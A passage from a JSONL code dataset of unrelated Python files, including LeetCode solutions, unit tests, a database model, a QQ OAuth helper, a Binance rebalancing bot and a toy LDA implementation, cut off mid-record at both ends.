O(amount)\r\n#https://leetcode.com/problems/coin-change/discuss/77372/Clean-dp-python-code\r\nclass Solution1(object):\r\n    def coinChange(self, coins, amount):\r\n        MAX = float('inf')\r\n        dp = [0] + [MAX] * amount\r\n\r\n        for i in range(1, amount + 1):\r\n            dp[i] = min([dp[i - c] if i - c >= 0 else MAX for c in coins]) + 1\r\n\r\n#        return [dp[amount], -1][dp[amount] == MAX]\r\n        if dp[amount] == MAX: return -1\r\n        else: return dp[amount] \r\n    \r\nif __name__ == \"__main__\":\r\n    print(Solution().coinChange([1,2,5], 11))","sub_path":"Python3.6/322-Py3-M-Coin-Change.py","file_name":"322-Py3-M-Coin-Change.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
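A quick sanity check of the dp recurrence described in the coin-change record above; this is a hedged sketch, not part of the original dataset, with dp[i] read as "fewest coins summing to i":

import sys

def coin_change(coins, amount):
    INF = float("inf")
    dp = [0] + [INF] * amount              # dp[0] = 0 coins to make amount 0
    for i in range(1, amount + 1):
        for c in coins:
            if i - c >= 0 and dp[i - c] + 1 < dp[i]:
                dp[i] = dp[i - c] + 1      # coin c on top of the best way to make i - c
    return -1 if dp[amount] == INF else dp[amount]

# Reproduces the two documented examples from the record above.
assert coin_change([1, 2, 5], 11) == 3     # 11 = 5 + 5 + 1
assert coin_change([2], 3) == -1           # 3 cannot be made from 2s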
+{"seq_id":"205231050","text":"\"\"\"\nPython implementation of Point inside the polygon,\n\"\"\"\n\n\nfrom ComputationalGeometry.modules import utils\n\n\ndef pointInsidePolygon(P, q):\n    count = 0\n    for idx, point in enumerate(P):\n        if idx != len(P) - 1:\n            if P[idx][0] <= q[0] <= P[idx + 1][0] or P[idx][0] >= q[0] >= P[idx + 1][0]:\n                if P[idx][1] < q[1]:\n                    count += 1\n                    print(P[idx], P[idx + 1])\n\n    if count % 2 == 1:\n        return True\n    else:\n        return False\n\n\nP = utils.dummy_simple_polygon()\n\nq = [368, 308]\n\nprint(\"Point inside polygon: \", pointInsidePolygon(P, q))\n\nimport matplotlib.pyplot as plt\n\ncoord = P\ncoord.append(coord[0])\n\nxs, ys = zip(*coord)\n\nplt.figure()\nplt.plot(xs, ys)\nplt.plot([q[0]], [q[1]], marker='o', markersize=4, color=\"red\")\nplt.show()\n","sub_path":"ComputationalGeometry/pointInsidePolygon.py","file_name":"pointInsidePolygon.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"392693063","text":"\"\"\"\nIn the following example, two kinds of information are stored for\neach pizza: the type of crust and the list of toppings. The list of toppings\nis a value associated with the key 'toppings'. To use the items in the list,\nwe give the name of the dictionary and the key 'toppings', just as we would\nwith any value in the dictionary. Instead of returning a single value, we get\na list of toppings:\n\"\"\"\n\n#Stores information about a pizza that is being ordered\npizza = {\n    'casca': 'grossa',\n    'coberturas': ['cogumelo', 'queijo extra'],\n}\n\n#Summarize the order\nprint(\"Você pediu a pizza com a casca \" + pizza['casca'] + \" e com a seguinte cobertura:\")\n\nfor cobertura in pizza['coberturas']:\n    print(\"\\t\" + cobertura)","sub_path":"Capitulo 6/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
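The pizza record above indexes the stored list directly, which raises KeyError if the key is absent; a minimal sketch (not from the original file, with illustrative English keys and data) of the same nested-dict pattern using dict.get() with a fallback:

# Same dict-holding-a-list pattern as the pizza example above; .get()
# returns [] instead of raising when no toppings were recorded.
pizza = {'crust': 'thick', 'toppings': ['mushroom', 'extra cheese']}
print("You ordered a " + pizza['crust'] + "-crust pizza with:")
for topping in pizza.get('toppings', []):  # empty list for a bare pizza
    print("\t" + topping)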
+{"seq_id":"214891025","text":"# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom oslo_log import log as logging\nimport testtools\n\nfrom neutron.plugins.ml2.drivers.linuxbridge.agent import \\\n    linuxbridge_neutron_agent\nfrom neutron.tests.functional.agent.linux import test_ip_lib\n\nLOG = logging.getLogger(__name__)\nlba = linuxbridge_neutron_agent\n\n\nclass LinuxBridgeAgentTests(test_ip_lib.IpLibTestFramework):\n\n    def setUp(self):\n        super(LinuxBridgeAgentTests, self).setUp()\n        agent_rpc = ('neutron.agent.rpc.PluginApi')\n        mock.patch(agent_rpc).start()\n        mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()\n\n    def test_validate_interface_mappings(self):\n        mappings = {'physnet1': 'int1', 'physnet2': 'int2'}\n        with testtools.ExpectedException(SystemExit):\n            lba.LinuxBridgeManager(mappings)\n        self.manage_device(\n            self.generate_device_details()._replace(namespace=None,\n                                                    name='int1'))\n        with testtools.ExpectedException(SystemExit):\n            lba.LinuxBridgeManager(mappings)\n        self.manage_device(\n            self.generate_device_details()._replace(namespace=None,\n                                                    name='int2'))\n        lba.LinuxBridgeManager(mappings)\n","sub_path":"neutron/tests/functional/agent/test_l2_lb_agent.py","file_name":"test_l2_lb_agent.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"382237571","text":"from pyodbc import connect\nimport json\n\nclass HoaDon:\n    def __init__(self):\n        file = open('project/models/Data/NameServer.json',encoding='utf-8')\n        NameSerrver_1 = json.load(file)\n        file.close()\n        self.db = connect('Driver={SQL Server};Database='+NameSerrver_1[\"NameDatabase\"]+';Server='+NameSerrver_1[\"NameServer\"]+';Trusted_connection=Yes')\n\n    def Tao_HD(self, arr):\n        sql ='''INSERT INTO dbo.HoaDon(MaHD,idKH,id,DateTT,TongTien)\n                VALUES( ?, ? ,? , ?, ?)'''\n        cur = self.db.cursor()\n        cur.execute(sql,arr)\n        ret = cur.rowcount\n        self.db.commit()\n        cur.close()\n        return ret\n    \n    \n    def Lay_HD_idKH(self, idKH):\n        sql = '''SELECT MaHD,idKH,id,CONVERT(varchar,DateTT,103) AS 'DateTT',TongTien FROM dbo.HoaDon WHERE idKH = ?'''\n        cur = self.db.cursor()\n        cur.execute(sql,(idKH, ))\n        v = cur.fetchone()\n        cur.close()\n        return v\n    \n    def Lay_HD_MaHD(self, MaHD):\n        sql = '''SELECT MaHD,idKH,id,CONVERT(varchar,DateTT,103) AS 'DateTT',TongTien FROM dbo.HoaDon WHERE MaHD = ?'''\n        cur = self.db.cursor()\n        cur.execute(sql,(MaHD, ))\n        v = cur.fetchone()\n        cur.close()\n        return v\n    \n    def TongHD_Thang(self, Thang,Nam):\n        sql = ''' SELECT COUNT(DISTINCT a.MaHD ) AS 'TongHDMonth' FROM dbo.CTHD a, dbo.HoaDon b WHERE a.MaHD=b.MaHD AND MONTH(b.DateTT)=? AND YEAR(b.DateTT)=? '''\n        cur = self.db.cursor()\n        cur.execute(sql,(Thang,Nam, ))\n        v = cur.fetchone()\n        cur.close()\n        return v[0]\n    \n    def Lay_HD_NV_theoThang(self,idNV,thang,Nam):\n        sql = ''' SELECT a.MaHD,CONVERT(VARCHAR,a.DateTT,103) AS 'DateTT',a.TongTien,b.NameKH FROM dbo.HoaDon a, dbo.ThongTinKH b\n                WHERE a.idKH=b.idKH AND a.id=? AND MONTH(a.DateTT)=? AND YEAR(a.DateTT)=? '''\n        cur = self.db.cursor()\n        cur.execute(sql,(idNV,thang,Nam, ))\n        v = cur.fetchall()\n        cur.close()\n        return v\n\n    def del_HD(self,MaHD):\n        cur = self.db.cursor()\n        cur.execute('DELETE dbo.HoaDon WHERE MaHD =?',(MaHD,))\n        ret =cur.rowcount\n        self.db.commit()\n        cur.close()\n        return ret\n    \n    def Tong_Thu(self, Thang,Nam):\n        sql = ''' SELECT ISNULL(SUM(TongTien),0) AS 'TongThu' FROM HoaDon WHERE MONTH(DateTT)=? AND YEAR(DateTT)=? '''\n        cur = self.db.cursor()\n        cur.execute(sql,(Thang,Nam, ))\n        v = cur.fetchone()\n        cur.close()\n        return v[0]\n\n    def __del__(self):\n        self.db.close()\n","sub_path":"project/models/hoadon.py","file_name":"hoadon.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"234097921","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom datasets_list_page import DatasetsListPage\nfrom base_page import BasePage\nimport logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ExperimentResultsPage(BasePage):\n\n    # The maximum amount of time to wait for experiments to complete. 
15mins\n # Once this time has elapsed, the tests will fail.\n experiment_complete_timeout = 60 * 15\n\n results_table_id = 'bccvl-experimentresults-table'\n experiment_status_completed = 'COMPLETED'\n experiment_status_failed = 'FAILED'\n\n def has_results_header(self, header):\n table_header = self._get_result_table_header()\n return header in table_header.text\n\n def has_result_file(self, filename, algorithm=None):\n out_files = self._get_output_file_names(algorithm)\n return len(filter(lambda f: f.text == filename, out_files)) == 1\n\n def get_num_output_files(self):\n return len(self._get_output_file_names())\n\n def has_completed_successfully(self):\n return self.experiment_status_completed == self._get_experiment_status()\n\n def click_datasets(self):\n self.driver.find_element_by_css_selector('a.bccvllinks-datasets').click()\n new_dataset_list_page = DatasetsListPage(self.driver)\n return new_dataset_list_page\n\n def click_experiments(self):\n self.driver.find_element_by_css_selector('a.bccvllinks-experiments').click()\n from experiment_list_page import ExperimentListPage\n new_dataset_list_page = ExperimentListPage(self.driver)\n return new_dataset_list_page\n\n def has_completed_with_failure(self):\n return self.experiment_status_failed == self._get_experiment_status()\n\n def wait_for_experiment_to_complete(self):\n WebDriverWait(self.driver, self.experiment_complete_timeout).until(lambda s: self._is_experiment_complete())\n\n def _get_output_file_names(self, algorithm=None):\n\n if algorithm == None: # return all\n return self.driver.find_elements_by_css_selector(\"table#\" + self.results_table_id + \" tr:not(.info) p:first-child\")\n else: # only return the ones relevant to the algorithm\n items = self.driver.find_elements_by_css_selector(\"table#\" + self.results_table_id + \" tbody tr td:first-child\")\n\n # make a list\n results = []\n # keep track of current label\n current_label = None\n for item in items:\n # if it's a label, try match it\n if item.text.find(\" - \") != -1: # We found a label\n if current_label is not None: # Maybe we've already actually finished\n break\n if item.text.find(\" - \" + algorithm) != -1:\n if current_label is not None:\n break\n else:\n # Remember the algorithm we're working on\n current_label = algorithm\n\n # if it's a file,\n else:\n # see if we're in the right category\n if current_label is None: # we haven't found our label yet\n continue;\n else:\n # Append the filename onto the list\n results.append(item.find_element_by_css_selector(\"p\"))\n\n return results\n\n def _get_result_table_header(self):\n return self.driver.find_element_by_xpath(\"//table[@id='\" + self.results_table_id + \"']/tbody/tr[@class='info']/td\")\n\n def _get_experiment_status(self):\n return self.driver.find_element_by_css_selector(\"div.bccvl-expstatus\").get_attribute(\"data-status\")\n\n def _is_experiment_complete(self):\n # try to avoid race condition. The js on the experiment result\n # page refreshes the whole page automatically. 
If that happens\n # while selenium is checking for elements, it will fail\n # because all the previously selected elements are no longer available.\n # (StaleElementReferenceException: Message: u'Element not found in the cache - perhaps the page has changed since it was looked up')\n # selenium.wait_for_condition(\n # \"selenium.browserbot.getCurrentWindow().jQuery.active== 0\",\n # 60000)\n count = 5\n while count:\n try:\n experiment_status = self._get_experiment_status()\n return experiment_status in [self.experiment_status_completed, self.experiment_status_failed]\n except StaleElementReferenceException:\n count -= 1\n if not count:\n raise\n LOG.info(\"Page has been reloaded, let's wait a second and retry %d more times\", count)\n\n\n # Flag: newPageLoaded\n # func: wait_for_page_to_load\n","sub_path":"functional_tests/pages/experiment_results_page.py","file_name":"experiment_results_page.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"62900829","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 New Vector\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom mock import Mock\n\nfrom twisted.internet import defer\n\nfrom synapse.api.constants import UserTypes\nfrom synapse.handlers.user_directory import UserDirectoryHandler\nfrom synapse.storage.roommember import ProfileInfo\n\nfrom tests import unittest\nfrom tests.utils import setup_test_homeserver\n\n\nclass UserDirectoryHandlers(object):\n def __init__(self, hs):\n self.user_directory_handler = UserDirectoryHandler(hs)\n\n\nclass UserDirectoryTestCase(unittest.TestCase):\n \"\"\" Tests the UserDirectoryHandler. 
\"\"\"\n\n    @defer.inlineCallbacks\n    def setUp(self):\n        hs = yield setup_test_homeserver(self.addCleanup)\n        self.store = hs.get_datastore()\n        hs.handlers = UserDirectoryHandlers(hs)\n\n        self.handler = hs.get_handlers().user_directory_handler\n\n    @defer.inlineCallbacks\n    def test_handle_local_profile_change_with_support_user(self):\n        support_user_id = \"@support:test\"\n        yield self.store.register(\n            user_id=support_user_id,\n            token=\"123\",\n            password_hash=None,\n            user_type=UserTypes.SUPPORT\n        )\n\n        yield self.handler.handle_local_profile_change(support_user_id, None)\n        profile = yield self.store.get_user_in_directory(support_user_id)\n        self.assertTrue(profile is None)\n        display_name = 'display_name'\n\n        profile_info = ProfileInfo(\n            avatar_url='avatar_url',\n            display_name=display_name,\n        )\n        regular_user_id = '@regular:test'\n        yield self.handler.handle_local_profile_change(regular_user_id, profile_info)\n        profile = yield self.store.get_user_in_directory(regular_user_id)\n        self.assertTrue(profile['display_name'] == display_name)\n\n    @defer.inlineCallbacks\n    def test_handle_user_deactivated_support_user(self):\n        s_user_id = \"@support:test\"\n        self.store.register(\n            user_id=s_user_id,\n            token=\"123\",\n            password_hash=None,\n            user_type=UserTypes.SUPPORT\n        )\n\n        self.store.remove_from_user_dir = Mock()\n        self.store.remove_from_user_in_public_room = Mock()\n        yield self.handler.handle_user_deactivated(s_user_id)\n        self.store.remove_from_user_dir.assert_not_called()\n        self.store.remove_from_user_in_public_room.assert_not_called()\n\n    @defer.inlineCallbacks\n    def test_handle_user_deactivated_regular_user(self):\n        r_user_id = \"@regular:test\"\n        self.store.register(user_id=r_user_id, token=\"123\", password_hash=None)\n        self.store.remove_from_user_dir = Mock()\n        self.store.remove_from_user_in_public_room = Mock()\n        yield self.handler.handle_user_deactivated(r_user_id)\n        self.store.remove_from_user_dir.assert_called_once_with(r_user_id)\n        self.store.remove_from_user_in_public_room.assert_called_once_with(r_user_id)\n","sub_path":"tests/handlers/test_user_directory.py","file_name":"test_user_directory.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
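The test record above originally called mock.not_called() and mock.called_once_with(...), which pass silently because a Mock auto-creates any attribute you access; a small sketch of the difference, using the standard-library unittest.mock rather than the mock package imported in that file:

from unittest import mock

m = mock.Mock()
m("unexpected call")       # the mock really is called once
m.not_called()             # no-op: just invokes an auto-created child mock, checks nothing
try:
    m.assert_not_called()  # a real assertion: raises because m was called above
except AssertionError:
    print("assert_not_called() correctly flags the call")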
+{"seq_id":"530956227","text":"\nfrom django.conf import settings\nfrom urllib.parse import urlencode,parse_qs\nfrom urllib.request import urlopen\nimport logging\nfrom .exceptions import QQAPIException\nimport json\n\nlogger = logging.getLogger(\"django\")\nclass OAuthQQ():\n    \"\"\"\n    Helper class for QQ login\n    Provides the methods that QQ login may need\n    \"\"\"\n    def __init__(self,app_id=None,app_key=None,redirect_url=None,state=None):\n        self.app_id= app_id or settings.QQ_APP_ID\n        self.app_key = app_key or settings.QQ_APP_KEY\n        self.redirect_url = redirect_url or settings.QQ_REDIRECT_URL\n        self.state = state or settings.QQ_STATE\n\n\n    def generate_qq_login_url(self):\n        \"\"\"\n        Build the QQ login URL\n        :return: the login URL\n        \"\"\"\n        params ={\n            'response_type':'code',\n            'client_id':self.app_id,\n            'redirect_uri':self.redirect_url,\n            'state':self.state,\n            'scope':'get_user_info' # fetch the user's profile info\n        }\n\n        url = \"https://graph.qq.com/oauth2.0/authorize?\"+urlencode(params)\n        print(url)\n        return url\n\n    def get_access_token(self,code):\n        \"\"\"\n        Fetch the QQ access_token\n        :param code: the authorization code\n        :return: the access_token\n        \"\"\"\n        url = \"https://graph.qq.com/oauth2.0/token?\"\n        req_data = {\n            \"grant_type\":\"authorization_code\",\n            \"client_id\":self.app_id,\n            \"client_secret\":self.app_key,\n            \"code\":code,\n            \"redirect_uri\":self.redirect_url\n        }\n        url += urlencode(req_data)\n        try:\n            # send the request and read the data QQ returns\n            response = urlopen(url)\n            response = response.read().decode()\n\n            # convert the returned data into a dict\n            resp_dict = parse_qs(response)\n\n            access_token = resp_dict.get(\"access_token\")[0]\n        except Exception as e:\n            logger.error(e)\n            raise QQAPIException(\"failed to get access_token\")\n        return access_token\n\n    def get_openid(self,access_token):\n        \"\"\"\n        Fetch the QQ openid\n        :param access_token: the call credential\n        :return: the openid\n        \"\"\"\n        url = \"https://graph.qq.com/oauth2.0/me?access_token=\"+access_token\n        try:\n            # send the request and read the data QQ returns\n            response = urlopen(url)\n            response_data = response.read().decode()\n\n            # convert the returned data into a dict\n            data = json.loads(response_data[10:-4])\n\n        except Exception:\n            data = parse_qs(response_data)\n            logger.error(\"code=%s msg=%s\" % (data.get('code'),data.get('msg')))\n            raise QQAPIException(\"failed to get openid\")\n\n\n        openid = data.get(\"openid\",None)\n        return openid","sub_path":"meiduo_mall/meiduo_mall/apps/oauth/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"279785979","text":"\"\"\"makeidentifier -- Convert AppleScript keywords to Python identifiers.\n\n(C) 2004 HAS\n\"\"\"\n\nimport keyword, string\n\n# NOTE: 'filter' is deprecated as reserved word; TO DO: remove 'filter' from list of reserved words in next release\n\n######################################################################\n# PRIVATE\n######################################################################\n# Reserved names of identifiers used in Specifier and Test classes\n\n# IMPORTANT: reserved words and prefix defined here must match reserved function and property names defined in appscript.specifier classes and method keyword args\n\n_reservedPrefix = 'AS_'\n\n_reservedWords = \"\"\"\n\t\ttimeout waitreply resulttype ignore telltarget\n\t\tfilter\n\t\tID previous next\n\t\tstart end before after\n\t\tfirst last middle any\n\t\tstartswith endswith contains isin\n\t\tdoesnotstartwith doesnotendwith doesnotcontain isnotin\n\t\tAND OR NOT\n\t\tstarttransaction endtransaction\n\t\thelp\n\t\t\"\"\".split()\n\n# Special conversions for selected characters in AppleScript keywords; makes appscript users' lives easier. Note this is a lossy conversion, but chances of this causing name collisions are very low unless application developers are very stupid in choosing keyword names in their dictionaries. 
(Mind, this wouldn't have been a problem had Apple restricted them all to using only alphanumeric and space characters to begin with, which would've allowed simple, unambiguous conversion to C-style identifiers and back.)\n\n_specialConversions = {\n\t\t' ': '_',\n\t\t'-': '_',\n\t\t'&': 'and',\n\t\t'/': '_',\n\t\t}\n\n_cache = {}\n\n_legalChars = string.ascii_letters + '_'\n_alphanum = _legalChars + string.digits\n\n######################################################################\n# PUBLIC\n######################################################################\n\ndef convert(s):\n\t\"\"\"Convert unicode string to Python identifier.\n\t\ts : string or unicode\n\t\tResult : string\n\t\"\"\"\n\tif not _cache.has_key(s):\n\t\tlegal = _legalChars\n\t\tres = ''\n\t\tfor c in s:\n\t\t\tif c in legal:\n\t\t\t\tres += c\n\t\t\telif _specialConversions.has_key(c):\n\t\t\t\tres += _specialConversions[c]\n\t\t\telse:\n\t\t\t\tif res == '':\n\t\t\t\t\tres = '_' # avoid creating an invalid identifier\n\t\t\t\tres += '0x%2.2X' % ord(c)\n\t\t\tlegal = _alphanum\n\t\tif keyword.iskeyword(res) or res in _reservedWords or res.startswith('_') or res.startswith(_reservedPrefix):\n\t\t\tres += '_'\n\t\t_cache[s] = str(res)\n\treturn _cache[s]\n","sub_path":"py-appscript/tags/py-appscript-0.16.2/Lib/osaterminology/makeidentifier.py","file_name":"makeidentifier.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"124548851","text":"from binance.account import account\nimport binance.market as market\nfrom data.candles import candleLoader\nfrom portfolioManagement.portfolioManagement import MAMRPortfolioManager\nimport pickle\n\nimport datetime\nimport numpy as np\n\nMAMR_MGR = 'data.pkl'\nBINANCE_BOT = 'bot.pkl'\n\n#Currencies to Include in selection\nCURRENCIES = ['ETH', 'EOS', 'FTT', 'LTC', 'BCH', 'ADA']\n#Quote Assets\nQUOTES = ['BTC', 'BNB']\nRISKLESS = 'USDT'\n\n\nDATABASE = 'data/candles_12h.db'\n\nclass binanceBot:\n\tdef __init__(self, api, secret, saved=None, n=26):\n\t\tself.account = account(api, secret)\n\t\tself.balances = np.array([self.account.balances[c] if c in self.account.balances else 0.0 for c in [RISKLESS] + QUOTES + CURRENCIES])\n\n\t\t\n\n\t\tif saved is not None:\n\t\t\ttry:\n\t\t\t\twith open(saved, 'rb') as file:\n\t\t\t\t\tloaded = pickle.load(file)\n\t\t\t\t\tself.manager = loaded.manager\n\t\t\t\t\tself.prices = loaded.prices\n\t\t\t\t\tself.returns = loaded.returns\n\t\t\t\t\tself.update_times = loaded.update_times\n\t\t\t\t\tself.portfolio = np.array(loaded.portfolio)\n\t\t\t\t\treturn\n\n\t\t\texcept FileNotFoundError:\n\t\t\t\tpass\n\n\t\t#get the portfolio...\n\t\tself.manager = MAMRPortfolioManager(len(CURRENCIES) + len(QUOTES) + 1, 4.105, 9.5, 1000, 0.0, n)\n\t\t\n\n\t\tfrom data.get_candles_spot import main as get_candles\n\t\tget_candles()\n\n\t\t\n\n\t\tprice_changes = []\n\t\ttimes = []\n\t\tself.prices = []\n\t\t\n\t\tfor candle in candleLoader(DATABASE):\n\t\t\t#consider markets trading against BTC, so we need to invert the USDT price\n\t\t\tself.prices.append(np.array([1] + [candle[currency + 'USDT_OPEN'] for currency in QUOTES + CURRENCIES]))\n\t\t\tif len(self.prices) == 1:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprice_changes.append(self.prices[-1] / self.prices[-2])\n\t\t\t\ttimes.append(candle['open_time'])\n\n\t\tfor change, time in zip(price_changes[-n:], times[-n:]):\n\t\t\tself.manager.update(time, change)\n\n\n\t\tself.returns = 
price_changes\n\t\tself.update_times = times\n\t\tself.portfolio = self.account.get_portfolio_weighted(['USDT'] + QUOTES + CURRENCIES)\n\t\t\n\t\tself.manager.portfolio = np.array(self.portfolio)\n\t\tself.prices.append(np.array([1.05 ** (0.5 / 365)] + [np.mean(market.prices([a + 'USDT' for a in QUOTES + CURRENCIES])[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\n\tdef save(self, location):\n\t\twith open(location, 'wb') as file:\n\t\t\tpickle.dump(self, file)\n\n\tdef update(self):\n\t\tmarket_prices =market.prices([a + 'USDT' for a in QUOTES + CURRENCIES])\n\t\t#self.prices.append(np.array([1.05 ** (0.5 / 365)] + [np.mean(market_prices[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\t\tself.prices.append(np.array([1] + [np.mean(market_prices[b + 'USDT']) for b in QUOTES + CURRENCIES]))\n\t\treturns = self.prices[-1] / self.prices[-2]\n\t\treturns[0] = 1.05 ** (0.5 / 365) #should get realtime returns\n\n\t\tself.returns.append(returns)\n\t\tself.update_times.append(int(datetime.datetime.now().timestamp() * 1000))\n\t\tusd_balances = self.balances * self.prices[-1]\n\n\t\tself.manager.update(self.update_times[-1], self.returns[-1])\n\n\t\t\n\t\ttarget_portfolio = np.array(self.manager.portfolio)\n\t\t#swutch bnb abd usdt to get fee reductions\n\t\tusdt_proportion = target_portfolio[0]\n\t\ttarget_portfolio[0] = target_portfolio[2]\n\t\ttarget_portfolio[2] = usdt_proportion\n\t\t\n\t\t#The prices in BNB will be aquired in the trade method, maybe should just get these originally... \n\t\tself.account.trade_to_portfolio('BNB', ['BNB', 'BTC', 'USDT'], CURRENCIES, target_portfolio)\n\n\n\t\tself.portfolio = self.account.get_portfolio_weighted(['USDT'] + QUOTES + CURRENCIES)\n\t\tprint(self.portfolio, self.manager.portfolio)\n\t\t\n\t\twith open('output.txt', 'a') as file:\n\t\t\tfile.write(str(self.manager.portfolio) + str(self.portfolio))\n\n\ndef main():\n\n\n\ttry:\n\t\timport keys\n\texcept ModuleNotFoundError:\n\t\tprint('keys.py file missing - see readme for set up instructions')\n\t\treturn \n\n\tbot = binanceBot(keys.API, keys.SECRET, 'state.pkl')\n\t\n\tbot.update()\n\tbot.save('state.pkl')\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"221012306","text":"#!/usr/bin/env python\n#coding=utf-8\nimport numpy as np\nfrom scipy import linalg\n\n'''\n@author: FreeMind\n@version: 1.0\nCreated on 2014/3/9\nA toy implementation of Linear Discriminant Analysis(LDA) algorithm\n'''\n\nclass LDA:\n def __init__(self,test_data,targetDim):\n self.testData = test_data\n #Retrieve the class number of the test_data\n self.classSet = set([sample[-1] for sample in test_data])\n self.classNum = len(self.classSet)\n #Get the size of the training set\n self.sampleSize = len(test_data)\n #Get the dimension of the data\n self.dim = len(test_data[1])-1\n #Set the target dimension\n self.targetDim = targetDim\n \n #Train for the LDA algorithm\n def train(self):\n #Separate the data according to the classSet\n dict_sample = {} \n dict_count = {}\n meanList = {} \n totalMean = np.zeros(self.dim)\n for sample in self.testData:\n if sample[-1] not in dict_sample.keys():\n dict_sample[sample[-1]] = [sample[:-1]]\n dict_count[sample[-1]] = 1\n else:\n dict_sample[sample[-1]].append(sample[:-1])\n dict_count[sample[-1]] +=1\n if sample[-1] not in meanList.keys():\n meanList[sample[-1]] = []\n for i in range(self.dim):\n 
meanList[sample[-1]].append(sample[i])\n else:\n for i in range(self.dim):\n meanList[sample[-1]][i] += sample[i]\n for key in dict_count.keys():\n for i in range(self.dim):\n totalMean[i] += meanList[key][i]\n meanList[key][i] /= dict_count[key] \n for i in range(self.dim):\n totalMean[i] /= self.sampleSize\n #Calculate the scatter matrix\n Sb = np.zeros([self.dim,self.dim])\n Sw = np.zeros([self.dim,self.dim])\n for key in dict_count.keys():\n tempArray = np.array(meanList[key])-np.array(totalMean)\n tempArray.shape = (self.dim,1)\n Sb += dict_count[key]*np.dot(tempArray,np.transpose(tempArray))\n for sample in self.testData:\n tempArray = np.array(meanList[sample[-1]])-np.array(sample[:-1])\n tempArray.shape=(self.dim,1)\n Sw+=np.dot(tempArray,np.transpose(tempArray))\n matrixFinal = np.dot(linalg.inv(Sw),Sb)\n eigenValue,eigenVector = linalg.eig(matrixFinal)\n print(eigenValue)\n print(eigenVector)\n \n #predict using the LDA algorithm\n def predict(self,predict_data):\n pass\n \n\n\n#Test case\nif __name__ == \"__main__\":\n test_data =[[2.95,6.63,\"Qualified\"],[2.53,7.79,\"Qualified\"],[3.57,5.65,\"Qualified\"],\n [3.16,5.47,\"Qualified\"],[2.58,4.46,\"Unqualified\"],\n [2.16,6.22,\"Unqualified\"],[3.27,3.52,\"Unqualified\"]]\n lda = LDA(test_data,1)\n lda.train()\n #lda.predict([[2.81,5.46]])\n \n ","sub_path":"ml/classfication/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"328863276","text":"\n#int sum = 0;\n\nsumO = 0\nwhile True :\n read = int(input())\n if (read == 0) :\n break\n \n\n # do something here\n sumO = sumO + read\n\n print(\"Sum now: \" + str(sumO))\n\n\nprint(\"Sum in the end: \" + str(sumO))\n","sub_path":"Python/Week 2/SumOfManyNumbers.py","file_name":"SumOfManyNumbers.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"542325229","text":"from metis.core.query import ExecutableNode\nfrom metis.core.query.aggregate import Aggregator\nfrom metis.core.query.aggregate import GroupBy\nfrom metis.core.query.condition import Condition\nfrom metis.core.query.stream import Stream\nfrom metis.core.query.value import Value\nfrom metis.utils.enum import Enum\n\n\ndef _parse_stream_or_transform(_dict):\n if not _dict:\n return None\n typ = _dict['type']\n if typ in Stream.Type.values():\n return Stream.parse(_dict)\n assert typ in Transform.Type.values()\n return Transform.parse(_dict)\n\n\nclass Transform(ExecutableNode):\n class Type(Enum):\n PROJECT = 'project'\n FILTER = 'filter'\n ORDER_BY = 'order_by'\n LIMIT = 'limit'\n AGGREGATE = 'aggregate'\n JOIN = 'join'\n\n def __init__(self, alias=None):\n self.alias = alias\n\n def validate(self):\n return self.type in Transform.Type.values()\n\n @classmethod\n def parse(self, _dict):\n typ = _dict['type']\n\n if typ in Stream.Type.values():\n return Stream.parse(_dict)\n\n assert typ in Transform.Type.values()\n del _dict['type']\n\n if 'stream' in _dict:\n _dict['stream'] = _parse_stream_or_transform(_dict['stream'])\n\n if typ == Transform.Type.PROJECT:\n return 